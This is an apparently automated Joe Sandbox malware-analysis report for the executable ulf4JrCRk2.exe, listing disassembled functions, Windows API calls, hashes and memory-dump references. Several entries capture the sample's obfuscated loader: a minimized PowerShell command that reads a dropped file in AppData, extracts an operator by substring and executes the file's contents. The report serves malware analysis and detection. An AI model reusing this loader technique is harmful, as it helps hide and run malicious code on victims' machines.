Instruction ID: 362732d661397dfbd4d13a455e5b242d3c248a06ae4e9e58d05d54b49be68c20
Opcode Fuzzy Hash: 7c3b74398c38f172e1519338bca71769cfe788df72e053bc328fcfef0089e390
Instruction Fuzzy Hash: E7714671E00228CBDF28CF98C854BADBBB1FB44305F15816EE816BB291D7386A56DF45

Function 00402F1F Relevance: 4.6, APIs: 3, Instructions: 95fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000,00409130,?), ref: 00402F45
WriteFile.KERNELBASE(00000000,004128A0,?,000000FF,00000000,004128A0,00004000,00409130,00409130,00000004,00000004,00000000,00000000,?,?), ref: 00402FD2

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: File$PointerWrite
String ID:
API String ID: 539440098-0
Opcode ID: b34524b006225fd86995ffc18ec7893ffd6bb3b8ae62ae05747d43261111392a
Instruction ID: 299fc1a8812a7dc38163d95f9210b7a7d751e7dd8a0fa05609209fb9265a90e4
Opcode Fuzzy Hash: b34524b006225fd86995ffc18ec7893ffd6bb3b8ae62ae05747d43261111392a
Instruction Fuzzy Hash: B2314871502259EFDF20DF59DE44A9E3BA8EF043A5F20403AF908E61D0D374DA41EBA9

Function 00401E32 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00404FDC: lstrlenA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
Part of subcall function 00404FDC: lstrlenA.KERNEL32(00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
Part of subcall function 00404FDC: lstrcatA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00402C51,00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000), ref: 00405038
Part of subcall function 00404FDC: SetWindowTextA.USER32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) "), ref: 0040504A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098

Part of subcall function 004054A4: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00421500,Error launching installer), ref: 004054C9
Part of subcall function 004054A4: CloseHandle.KERNEL32(?), ref: 004054D6

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E6C
GetExitCodeProcess.KERNEL32(?,?), ref: 00401E7C
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EA1

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
String ID:
API String ID: 3521207402-0
Opcode ID: 6a5de7a37bb700338687ddac31e5bfd3191d7f94f57ef416233b19e3b48e67ff
Instruction ID: 0e472d9888b0de42699340f3058b26b535eb6e7fa7af9e3b9e30c9644b91f742
Opcode Fuzzy Hash: 6a5de7a37bb700338687ddac31e5bfd3191d7f94f57ef416233b19e3b48e67ff
Instruction Fuzzy Hash: 92016D31904114FBCF11AFA1CD459AE7B71EB00345F10847BEA01B51E1C3784A81EBAA

Function 00405BD8 Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,00405E1D,00000000,00000002,?,00000002,?,?,00405E1D,80000002,Software\Microsoft\Windows\CurrentVersion,?,004226A0,?), ref: 00405C01
RegQueryValueExA.KERNELBASE(?,?,00000000,00405E1D,?,00405E1D), ref: 00405C22
RegCloseKey.KERNELBASE(?), ref: 00405C43

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
Instruction ID: a34a41eefb499e4b528ee0e15ee2ddc390ed289ee56622bd58176e85d3ab8876
Opcode Fuzzy Hash: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
Instruction Fuzzy Hash: 05015A7114520EEFEB228F64EC45AEB3FACEF15358F004036F944A6220D235D964CBA5

Function 0040243A Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F

RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402468
RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 0040247B
RegCloseKey.KERNELBASE(?,?,?,%machinates%\vatter\udkastelses.Bss116,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: eed3c90d5c7e348fca0c4a701ef40ffaeb7a435824ebab2efc96f61ffb84ef12
Instruction ID: 09a8887cd5e4729410dcfabe5c46d2a670465c21522258ca6cdcbf1033b2090e
Opcode Fuzzy Hash: eed3c90d5c7e348fca0c4a701ef40ffaeb7a435824ebab2efc96f61ffb84ef12
Instruction Fuzzy Hash: E8F08671904204FFD7119F659D8CEBF7A6CEB40748F10453EF441B62C0D6B95E41966A

Function 00401DD8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Roaming\supersystem\panelet,?), ref: 00401E1E

Strings

C:\Users\user\AppData\Roaming\supersystem\panelet, xrefs: 00401E09

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: ExecuteShell
String ID: C:\Users\user\AppData\Roaming\supersystem\panelet
API String ID: 587946157-2983365704
Opcode ID: 5b3355ea5905195ef51b073903dfe525f6ce29c1a6d67b87f90c054022239ed3
Instruction ID: 92cbb6ba42742382510c3a8e41a68a30635fa0dc9ae6a59fa4a75f74f7b170a3
Opcode Fuzzy Hash: 5b3355ea5905195ef51b073903dfe525f6ce29c1a6d67b87f90c054022239ed3
Instruction Fuzzy Hash: 8DF0F6B3B041047ACB41ABB59E4AE5D2BA4EB41718F240A3BF400F71C2DAFC8841F728

Function 004023C8 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F

RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004023F8
RegCloseKey.KERNELBASE(?,?,?,%machinates%\vatter\udkastelses.Bss116,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: cb37a1a76a93e2e641020109eab2c616a2fbad872fa47cbac7c87315435c727b
Instruction ID: 0332112a018d0e07836895fa5cafc858bad159e104d866fff78bcbb739cef185
Opcode Fuzzy Hash: cb37a1a76a93e2e641020109eab2c616a2fbad872fa47cbac7c87315435c727b
Instruction Fuzzy Hash: C111C171905205EFDB11DF60CA889BEBBB4EF00344F20843FE442B62C0D2B84A41EB6A

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
Instruction ID: da56ad7cfcb2a9fecb994a09e4a0bd113f750103611445cd7b28aada07ee45e3
Opcode Fuzzy Hash: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
Instruction Fuzzy Hash: 2E012831B24210ABE7294B389D04B6A369CE710328F11823BF811F72F1D6B8DC42DB4D

Function 004022C0 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F

RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004022DF
RegCloseKey.ADVAPI32(00000000), ref: 004022E8

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: 8e6437201c4d01184a70f6be773875b8c7a361560ce53a8aacaaac3aabda72af
Instruction ID: 2c42072c31bcbbe471fcd7c214f11599c8a5ac898b8b604777345a29c8a948e9
Opcode Fuzzy Hash: 8e6437201c4d01184a70f6be773875b8c7a361560ce53a8aacaaac3aabda72af
Instruction Fuzzy Hash: 65F04F72A04111ABDB51ABB49A8EAAE6268AB40318F14453BF501B61C1DAFC5E01A66E

Function 004050AE Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 004050BE

Part of subcall function 00404038: SendMessageA.USER32(000103E4,00000000,00000000,00000000), ref: 0040404A

OleUninitialize.OLE32(00000404,00000000), ref: 0040510A

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: 431dfcc76cf9dde98b5e7aaf7b5ad5106ef7ccd0ca4a168cf4dec9602718c729
Instruction ID: bd05ba91e376626405d95ef9acebad21dc74d375a876cdf71cbeab3177fe6a51
Opcode Fuzzy Hash: 431dfcc76cf9dde98b5e7aaf7b5ad5106ef7ccd0ca4a168cf4dec9602718c729
Instruction Fuzzy Hash: B3F0F0F3A046009AEB216B14AC00B1777B4EBC4346F55C03EFF44B32A186B988428B6D

Function 0040155B Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000), ref: 00401579
ShowWindow.USER32(000103EA), ref: 0040158E

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: c64c6d1f079b89554086766a5c5b018e70a08e7419b7e9e5f4a1fba6667fe9af
Instruction ID: 8a385b190166ef4faee7ea7f7faf61a79327429c222f4cee9526e2a72d22cdd5
Opcode Fuzzy Hash: c64c6d1f079b89554086766a5c5b018e70a08e7419b7e9e5f4a1fba6667fe9af
Instruction Fuzzy Hash: 9FF0E577B08250BFC725CF64ED8086E77F5EB5531075444BFD102A3292C2B89D04DB18

Function 00405982 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\ulf4JrCRk2.exe,80000000,00000003), ref: 00405986
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A8

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
Instruction ID: 21e5f81f3e52fa2c8f9e5bc24a994218dd140026ef3a1e453d479de883aad6ce
Opcode Fuzzy Hash: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
Instruction Fuzzy Hash: 94D09E31668301AFEF098F20DD16F2E7BA2EB84B00F10562CB682D40E0D6755815DB16

Function 0040595D Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,?,00405575,?,?,00000000,00405758,?,?,?,?), ref: 00405962
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405976

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
Instruction ID: 52ea2c90687e5876e605324cdef58a02bfc8c1539d376b9eaaf3b2e35a2569c6
Opcode Fuzzy Hash: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
Instruction Fuzzy Hash: 33D0C972908520FBC2102728AD08C9BBB55EB582717018B32F865A22B0C7304C52CAA5

Function 00403695 Relevance: 2.5, APIs: 2, Instructions: 20COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,76F93410,004034D6,?), ref: 004036A7
CloseHandle.KERNEL32(FFFFFFFF,76F93410,004034D6,?), ref: 004036BB

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 2229e43d6289b38d5d47617bcce03355d5eaf097794c5503d34cf4d4932e4679
Instruction ID: 89c4926621b3ed489ac8dfb39f115d293634e1e2b72de2a3854944cb7e34118e
Opcode Fuzzy Hash: 2229e43d6289b38d5d47617bcce03355d5eaf097794c5503d34cf4d4932e4679
Instruction Fuzzy Hash: 2DE08630500620B6D530AF7CAD455463A185B41335B608B22F474F22F1C7389E875EAC

Function 00401705 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
